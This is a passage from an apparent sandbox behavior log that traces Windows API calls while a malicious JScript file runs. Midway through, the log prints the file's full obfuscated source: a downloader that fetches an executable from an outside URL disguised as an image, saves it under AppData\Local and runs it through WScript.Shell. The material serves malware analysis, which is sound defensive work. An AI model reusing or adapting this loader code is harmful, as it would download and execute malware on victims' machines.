out: lpflOldProtect=0x92e559c400*=0x4) returned 1 [0048.883] GetUserDefaultLCID () returned 0x409 [0048.883] GetACP () returned 0x4e4 [0048.883] LoadLibraryExA (lpLibFileName="amsi.dll", hFile=0x0, dwFlags=0x0) returned 0x7ffbf69d0000 [0049.046] GetProcAddress (hModule=0x7ffbf69d0000, lpProcName="AmsiInitialize") returned 0x7ffbf69d2260 [0049.046] GetProcAddress (hModule=0x7ffbf69d0000, lpProcName="AmsiScanString") returned 0x7ffbf69d26b0 [0049.046] AmsiInitialize () returned 0x0 [0049.206] GetCurrentThreadId () returned 0xe70 [0049.207] GetCurrentThreadId () returned 0xe70 [0049.207] RegOpenKeyExA (in: hKey=0xffffffff80000002, lpSubKey="Software\\Microsoft\\COM3", ulOptions=0x0, samDesired=0x20019, phkResult=0x92e559e878 | out: phkResult=0x92e559e878*=0x17c) returned 0x0 [0049.207] RegQueryValueExA (in: hKey=0x17c, lpValueName="COM+Enabled", lpReserved=0x0, lpType=0x92e559e870, lpData=0x92e559e868, lpcbData=0x92e559e860*=0x4 | out: lpType=0x92e559e870*=0x4, lpData=0x92e559e868*=0x1, lpcbData=0x92e559e860*=0x4) returned 0x0 [0049.207] RegCloseKey (hKey=0x17c) returned 0x0 [0049.207] GetModuleHandleW (lpModuleName="api-ms-win-core-delayload-l1-1-1.dll") returned 0x7ffc01360000 [0049.207] GetProcAddress (hModule=0x7ffc01360000, lpProcName="ResolveDelayLoadedAPI") returned 0x7ffc013ba1b0 [0049.207] GetProcAddress (hModule=0x7ffc01360000, lpProcName="ResolveDelayLoadsFromDll") returned 0x7ffc0141e790 [0049.208] ResolveDelayLoadedAPI () returned 0x7ffc01927000 [0049.208] CoCreateInstance (in: rclsid=0x7ffbed4c8c30*(Data1=0x323, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), pUnkOuter=0x0, dwClsContext=0x1, riid=0x7ffbed4c8c40*(Data1=0x146, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x92e559e820 | out: ppv=0x92e559e820*=0x7ffc01ad6e80) returned 0x0 [0049.211] GetEnvironmentVariableW (in: lpName="JS_PROFILER", lpBuffer=0x92e559e800, nSize=0x27 | out: lpBuffer="") returned 0x0 [0049.211] GetUserDefaultLCID () returned 0x409 [0049.211] IsValidLocale (Locale=0x409, dwFlags=0x1) returned 1 [0049.211] GetLocaleInfoA (in: Locale=0x409, LCType=0x1004, lpLCData=0x92e559e8a0, cchData=6 | out: lpLCData="1252") returned 5 [0049.211] IsValidCodePage (CodePage=0x4e4) returned 1 [0049.212] CoCreateInstance (in: rclsid=0x7ffbed4ca7b8*(Data1=0x6c736db1, Data2=0xbd94, Data3=0x11d0, Data4=([0]=0x8a, [1]=0x23, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0xb5, [6]=0x8e, [7]=0x10)), pUnkOuter=0x0, dwClsContext=0x1, riid=0x7ffbed4ca7a8*(Data1=0x6c736dc1, Data2=0xab0d, Data3=0x11d0, Data4=([0]=0xa2, [1]=0xad, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xf, [6]=0x27, [7]=0xe8)), ppv=0x92e59367e8 | out: ppv=0x92e59367e8*=0x92e561dc20) returned 0x0 [0049.212] IUnknown:AddRef (This=0x92e561dc20) returned 0x2 [0049.212] GetCurrentProcessId () returned 0xe6c [0049.212] GetCurrentThreadId () returned 0xe70 [0049.212] GetTickCount () returned 0x1ef3d [0049.212] ISystemDebugEventFire:BeginSession (This=0x92e561dc20, guidSourceID=0x7ffbed4c7ea0, strSessionName="JScript:00003692:00003696:18126781") returned 0x0 [0049.212] GetCurrentThreadId () returned 0xe70 [0049.213] GetTickCount () returned 0x1ef3d [0049.213] GetCurrentThreadId () returned 0xe70 [0049.213] CreateFileW (lpFileName="C:\\Users\\CIIHMN~1\\Desktop\\PAQUET~1.JS" (normalized: "c:\\users\\ciihmn~1\\desktop\\paquet~1.js"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8000000, hTemplateFile=0x0) returned 0x18c [0049.213] GetFileSize (in: hFile=0x18c, lpFileSizeHigh=0x0 | out: lpFileSizeHigh=0x0) returned 0x88e [0049.213] CreateFileMappingA (hFile=0x18c, lpFileMappingAttributes=0x0, flProtect=0x2, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x88e, lpName=0x0) returned 0x190 [0049.213] MapViewOfFile (hFileMappingObject=0x190, dwDesiredAccess=0x4, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x0) returned 0x92e5920000 [0049.214] GetVersionExA (in: lpVersionInformation=0x92e559ea70*(dwOSVersionInfoSize=0x94, dwMajorVersion=0x0, dwMinorVersion=0x2, dwBuildNumber=0x0, dwPlatformId=0x0, szCSDVersion="") | out: lpVersionInformation=0x92e559ea70*(dwOSVersionInfoSize=0x94, dwMajorVersion=0xa, dwMinorVersion=0x0, dwBuildNumber=0x2800, dwPlatformId=0x2, szCSDVersion="")) returned 1 [0049.214] IsTextUnicode (in: lpv=0x92e5920000, iSize=2190, lpiResult=0x92e559ea60 | out: lpiResult=0x92e559ea60) returned 0 [0049.214] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x92e5920000, cbMultiByte=2190, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 2190 [0049.214] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x92e5920000, cbMultiByte=2190, lpWideCharStr=0x92e561e6e8, cchWideChar=2190 | out: lpWideCharStr="var _$_f4ba=[\"UZqicziIAc\",\"zcAuqzQcCczpwQcQqaxUr\",\"zdnDUQcCpcwnAuDcqxzCvo\",\"rnuqQAdoZsuOqAzpaxadexZ\",\"IZvsnedoIQoIoczezvpeocxE\",\"MSXML2.XMLHTTP\",\"ADODB.Stream\",\"GET\",\"Open\",\"Send\",\"type\",\"open\",\"responseBody\",\"write\",\"savetofile\",\"uiptrqevcznmmczx\",\"\",\"random\",\"length\",\"floor\",\"substring\",\"9\",\"Process\",\"Environment\",\"WScript.Shell\",\"USERNAME\",\"C:\\\\Users\\\\\",\"\\\\AppData\\\\Local\\\\\",\"Scripting.FileSystemObject\",\"CreateFolder\",\"iQzoDoUqZz\",\"QdrdcicrsecOiDsQnAupu\",\"OQnzEOZCerIQdZQdxucDIA\",\"ndIuoazZdduaqUieQQezdiq\",\"ivUAnuUOdCaqcaxsxraQZCsI\",\"\\\\\",\"86976.exe\",\"\\\\ewowezdnav\",\"https://www.wkc.co.id/heritage58.com/js/lib/inode.jpg\",\"Sleep\",\"Wscript.Shell\",\"Exec\"];var OaQQUZDCxUAzsZn=_$_f4ba[0];var nQCZvuuuQiaIuzoz=_$_f4ba[1];var dQxnDQQvQzCDuZpaQ=_$_f4ba[2];var wIApiuaaICdzunZOva=_$_f4ba[3];var OsDqAUaaEzaaciiZazA=_$_f4ba[4];function qcvpcqaoco(_0x2878,_0x28C8){Ouezvicaiw= new ActiveXObject(_$_f4ba[5]);peCEQzaesz= new ActiveXObject(_$_f4ba[6]);Ouezvicaiw[_$_f4ba[8]](_$_f4ba[7],_0x2878,false);Ouezvicaiw[_$_f4ba[9]]();peCEQzaesz[_$_f4ba[10]]= 1;peCEQzaesz[_$_f4ba[11]]();peCEQzaesz[_$_f4ba[13]](Ouezvicaiw[_$_f4ba[12]]);peCEQzaesz[_$_f4ba[14]](_0x28C8,2)}function QueazpoUEq(_0x2A58){var _0x2918=_$_f4ba[15];var _0x2968=_$_f4ba[16];for(var _0x29B8=0;_0x29B8< _0x2A58;_0x29B8++){var _0x2A08=Math[_$_f4ba[19]](Math[_$_f4ba[17]]()* _0x2918[_$_f4ba[18]]);_0x2968+= _0x2918[_$_f4ba[20]](_0x2A08,_0x2A08+ 1)};return _0x2968}var UzzDZAUuQQ=QueazpoUEq(_$_f4ba[21]);environmentVars= new ActiveXObject(_$_f4ba[24])[_$_f4ba[23]](_$_f4ba[22]);var cqiiiscEZs=environmentVars(_$_f4ba[25]);var uApZCnQQxc=_$_f4ba[26]+ cqiiiscEZs+ _$_f4ba[27]+ UzzDZAUuQQ;oFSO= new ActiveXObject(_$_f4ba[28]);oFSO[_$_f4ba[29]](uApZCnQQxc);var iQAUiIZazE=uApZCnQQxc;var xnwOunzsEAOcCdQ=_$_f4ba[30];var EpQoACqciiZvcIvs=_$_f4ba[31];var uDOiEcOAAZQUnQDee=_$_f4ba[32];var cIQcQDUdwvxxIrcdci=_$_f4ba[33];var vzcwDiCsZccZCuQAdcc=_$_f4ba[34];var zCzaCZrZCZ=_$_f4ba[35]+ (_$_f4ba[36]);var wvDiQOnaiD=_$_f4ba[37];var QZznOEvnaI=(_$_f4ba[16]);qcvpcqaoco(_$_f4ba[38],iQAUiIZazE+ zCzaCZrZCZ);var rpcriiwDAp=iQAUiIZazE+ zCzaCZrZCZ;WScript[_$_f4ba[39]](500);var WSHELL= new ActiveXObject(_$_f4ba[40]);WSHELL[_$_f4ba[41]](rpcriiwDAp)") returned 2190 [0049.214] UnmapViewOfFile (lpBaseAddress=0x92e5920000) returned 1 [0049.214] CloseHandle (hObject=0x190) returned 1 [0049.214] LoadLibraryW (lpLibFileName="WLDP.DLL") returned 0x7ffbf39b0000 [0050.088] GetProcAddress (hModule=0x7ffbf39b0000, lpProcName="WldpGetLockdownPolicy") returned 0x7ffbf39b1010 [0050.088] GetProcAddress (hModule=0x7ffbf39b0000, lpProcName="WldpIsClassInApprovedList") returned 0x7ffbf39b3820 [0050.088] WldpGetLockdownPolicy () returned 0x10000000 [0050.088] CloseHandle (hObject=0x18c) returned 1 [0050.088] GetSystemDirectoryA (in: lpBuffer=0x92e559eaa8, uSize=0x0 | out: lpBuffer="") returned 0x14 [0050.088] GetSystemDirectoryA (in: lpBuffer=0x92e5936ba0, uSize=0x15 | out: lpBuffer="C:\\Windows\\system32") returned 0x13 [0050.089] strcpy_s (in: _Dst=0x92e5936bb3, _DstSize=0xf, _Src="\\" | out: _Dst="\\") returned 0x0 [0050.089] strcpy_s (in: _Dst=0x92e5936bb4, _DstSize=0xe, _Src="advapi32.dll" | out: _Dst="advapi32.dll") returned 0x0 [0050.089] LoadLibraryA (lpLibFileName="C:\\Windows\\system32\\advapi32.dll") returned 0x7ffc01640000 [0050.089] GetProcAddress (hModule=0x7ffc01640000, lpProcName="SaferIdentifyLevel") returned 0x7ffc0164a7d0 [0050.089] GetProcAddress (hModule=0x7ffc01640000, lpProcName="SaferComputeTokenFromLevel") returned 0x7ffc01643ba0 [0050.089] GetProcAddress (hModule=0x7ffc01640000, lpProcName="SaferCloseLevel") returned 0x7ffc01656cc0 [0050.090] IdentifyCodeAuthzLevelW () returned 0x1 [0051.516] GetVersionExA (in: lpVersionInformation=0x92e559cc80*(dwOSVersionInfoSize=0x94, dwMajorVersion=0x0, dwMinorVersion=0x0, dwBuildNumber=0x0, dwPlatformId=0x0, szCSDVersion="") | out: lpVersionInformation=0x92e559cc80*(dwOSVersionInfoSize=0x94, dwMajorVersion=0xa, dwMinorVersion=0x0, dwBuildNumber=0x2800, dwPlatformId=0x2, szCSDVersion="")) returned 1 [0051.516] GetUserDefaultLCID () returned 0x409 [0051.516] GetLocaleInfoW (in: Locale=0x409, LCType=0x20000070, lpLCData=0x92e559c7f0, cchData=2 | out: lpLCData="") returned 2 [0051.517] IsFileSupportedName () returned 0x1 [0051.517] _wcsicmp (_String1=".vbs", _String2=".js") returned 12 [0051.517] _wcsicmp (_String1=".vbe", _String2=".js") returned 12 [0051.517] _wcsicmp (_String1=".js", _String2=".js") returned 0 [0051.520] GetSignedDataMsg () returned 0x0 [0051.520] GetCurrentProcess () returned 0xffffffffffffffff [0051.520] DuplicateHandle (in: hSourceProcessHandle=0xffffffffffffffff, hSourceHandle=0x1b0, hTargetProcessHandle=0xffffffffffffffff, lpTargetHandle=0x92e559d4e0, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x92e559d4e0*=0x204) returned 1 [0051.520] GetFileSize (in: hFile=0x204, lpFileSizeHigh=0x0 | out: lpFileSizeHigh=0x0) returned 0x88e [0051.520] SetFilePointer (in: hFile=0x204, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0051.520] ReadFile (in: hFile=0x204, lpBuffer=0x92e5939bb0, nNumberOfBytesToRead=0x88e, lpNumberOfBytesRead=0x92e559d4a0, lpOverlapped=0x0 | out: lpBuffer=0x92e5939bb0*, lpNumberOfBytesRead=0x92e559d4a0*=0x88e, lpOverlapped=0x0) returned 1 [0051.520] CoInitialize (pvReserved=0x0) returned 0x1 [0051.520] CoCreateInstance (in: rclsid=0x7ffbed3fe7f8*(Data1=0x6290bd1, Data2=0x48aa, Data3=0x11d2, Data4=([0]=0x84, [1]=0x32, [2]=0x0, [3]=0x60, [4]=0x8, [5]=0xc3, [6]=0xfb, [7]=0xfc)), pUnkOuter=0x0, dwClsContext=0x1, riid=0x7ffbed3fe808*(Data1=0xe4d1c9b0, Data2=0x46e8, Data3=0x11d4, Data4=([0]=0xa2, [1]=0xa6, [2]=0x0, [3]=0x10, [4]=0x4b, [5]=0xd3, [6]=0x50, [7]=0x90)), ppv=0x92e559d400 | out: ppv=0x92e559d400*=0x92e593a8b0) returned 0x0 [0051.831] __dllonexit () returned 0x7ffbed3abcd0 [0051.831] __dllonexit () returned 0x7ffbed3abcf0 [0051.832] GetVersionExA (in: lpVersionInformation=0x92e559ae10*(dwOSVersionInfoSize=0x94, dwMajorVersion=0x7ffb, dwMinorVersion=0x0, dwBuildNumber=0x0, dwPlatformId=0xed3abcf0, szCSDVersion="û\x7f") | out: lpVersionInformation=0x92e559ae10*(dwOSVersionInfoSize=0x94, dwMajorVersion=0xa, dwMinorVersion=0x0, dwBuildNumber=0x2800, dwPlatformId=0x2, szCSDVersion="")) returned 1 [0051.832] GetProcessWindowStation () returned 0xbc [0051.832] GetUserObjectInformationA (in: hObj=0xbc, nIndex=1, pvInfo=0x92e559adf8, nLength=0xc, lpnLengthNeeded=0x92e559adf0 | out: pvInfo=0x92e559adf8, lpnLengthNeeded=0x92e559adf0) returned 1 [0051.832] DllGetClassObject (in: rclsid=0x92e561c5f0*(Data1=0x6290bd1, Data2=0x48aa, Data3=0x11d2, Data4=([0]=0x84, [1]=0x32, [2]=0x0, [3]=0x60, [4]=0x8, [5]=0xc3, [6]=0xfb, [7]=0xfc)), riid=0x7ffc01a5f7c0*(Data1=0x1, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x92e559be50 | out: ppv=0x92e559be50*=0x92e593a4a0) returned 0x0 [0051.832] IClassFactory:CreateInstance (in: This=0x92e593a4a0, pUnkOuter=0x0, riid=0x92e559cd50*(Data1=0xe4d1c9b0, Data2=0x46e8, Data3=0x11d4, Data4=([0]=0xa2, [1]=0xa6, [2]=0x0, [3]=0x10, [4]=0x4b, [5]=0xd3, [6]=0x50, [7]=0x90)), ppvObject=0x92e559be68 | out: ppvObject=0x92e559be68*=0x92e593a8b0) returned 0x0 [0051.832] GetSystemInfo (in: lpSystemInfo=0x92e559bce8 | out: lpSystemInfo=0x92e559bce8*(dwOemId=0x9, wProcessorArchitecture=0x9, wReserved=0x0, dwPageSize=0x1000, lpMinimumApplicationAddress=0x10000, lpMaximumApplicationAddress=0x7ffffffeffff, dwActiveProcessorMask=0x3, dwNumberOfProcessors=0x2, dwProcessorType=0x21d8, dwAllocationGranularity=0x10000, wProcessorLevel=0x6, wProcessorRevision=0x5e03)) [0051.833] VirtualQuery (in: lpAddress=0x92e559bce0, lpBuffer=0x92e559bd18, dwLength=0x30 | out: lpBuffer=0x92e559bd18*(BaseAddress=0x92e559b000, AllocationBase=0x92e54a0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0xffffd001)) returned 0x30 [0051.833] IUnknown:AddRef (This=0x92e593a8b0) returned 0x2 [0051.833] IUnknown:Release (This=0x92e593a8b0) returned 0x1 [0051.833] IUnknown:Release (This=0x92e593a4a0) returned 0x0 [0051.833] IUnknown:QueryInterface (in: This=0x92e593a8b0, riid=0x7ffbed3fe808*(Data1=0xe4d1c9b0, Data2=0x46e8, Data3=0x11d4, Data4=([0]=0xa2, [1]=0xa6, [2]=0x0, [3]=0x10, [4]=0x4b, [5]=0xd3, [6]=0x50, [7]=0x90)), ppvObject=0x92e559d398 | out: ppvObject=0x92e559d398*=0x92e593a8b0) returned 0x0 [0051.833] IUnknown:Release (This=0x92e593a8b0) returned 0x1 [0051.833] _strnicmp (_Str1="